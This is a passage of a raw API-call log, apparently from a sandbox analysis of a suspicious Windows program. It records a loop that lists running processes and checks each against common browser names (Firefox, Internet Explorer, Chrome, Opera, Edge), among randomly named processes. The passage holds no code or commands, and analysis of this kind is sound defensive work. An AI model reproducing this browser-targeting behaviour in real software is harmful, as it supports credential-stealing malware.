(lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0187.445] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0187.445] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0187.445] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0187.445] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0187.445] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0187.445] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0187.445] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.445] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0187.446] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0187.446] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0187.446] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0187.446] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0187.446] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.446] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0187.447] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0187.447] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0187.447] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0187.447] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0187.447] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.447] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0187.447] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0187.447] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0187.447] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0187.447] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0187.447] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0187.447] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0187.448] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0187.448] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0187.448] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0187.448] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0187.448] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0187.448] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0187.448] CloseHandle (hObject=0xe8) returned 1 [0187.448] Sleep (dwMilliseconds=0x3e8) [0188.483] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0188.484] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0188.485] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0188.485] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0188.485] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0188.485] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0188.485] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0188.485] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0188.486] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0188.486] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0188.486] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0188.486] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0188.486] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0188.486] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0188.486] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0188.486] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0188.486] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0188.486] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0188.486] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.486] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0188.487] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0188.487] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0188.487] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0188.487] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0188.487] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.487] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0188.487] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0188.487] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0188.487] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0188.487] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0188.487] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.487] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0188.488] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0188.488] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0188.488] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0188.488] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0188.488] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.488] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0188.489] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0188.489] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0188.489] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0188.489] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0188.489] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.489] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0188.489] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0188.489] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0188.489] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0188.489] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0188.489] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.489] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0188.490] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0188.490] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0188.490] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0188.490] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0188.490] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.490] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0188.490] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0188.490] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0188.490] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0188.490] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0188.490] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.490] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.491] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0188.491] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0188.491] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0188.491] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0188.491] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.491] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.491] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0188.491] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0188.492] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0188.492] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0188.492] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.492] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.492] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0188.492] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0188.492] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0188.492] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0188.492] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.492] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.493] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0188.493] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0188.493] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0188.493] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0188.493] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.493] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.493] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0188.493] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0188.493] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0188.493] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0188.493] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.493] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0188.494] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0188.494] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0188.494] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0188.494] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0188.494] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.494] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.495] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0188.495] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0188.495] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0188.495] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0188.495] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.495] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.495] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0188.495] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0188.495] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0188.495] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0188.495] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.495] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0188.496] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0188.496] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0188.496] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0188.496] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0188.496] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.496] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0188.496] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0188.496] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0188.496] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0188.496] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0188.496] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.496] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0188.497] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0188.497] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0188.497] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0188.497] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0188.497] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.497] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.498] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0188.498] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0188.498] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0188.498] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0188.498] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.498] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0188.498] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0188.498] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0188.498] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0188.498] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0188.498] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.498] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0188.499] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0188.499] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0188.499] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0188.499] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0188.499] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.499] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0188.499] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0188.499] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0188.499] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0188.499] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0188.499] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.499] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0188.500] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0188.500] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0188.500] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0188.500] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0188.500] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.500] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0188.500] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0188.501] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0188.501] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0188.501] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0188.501] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.501] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0188.501] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0188.501] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0188.501] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0188.501] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0188.501] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.501] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0188.502] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0188.502] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0188.502] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0188.502] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0188.502] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.502] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0188.502] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0188.502] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0188.502] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0188.502] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0188.502] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.502] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0188.503] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0188.503] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0188.503] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0188.503] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0188.503] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.503] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: 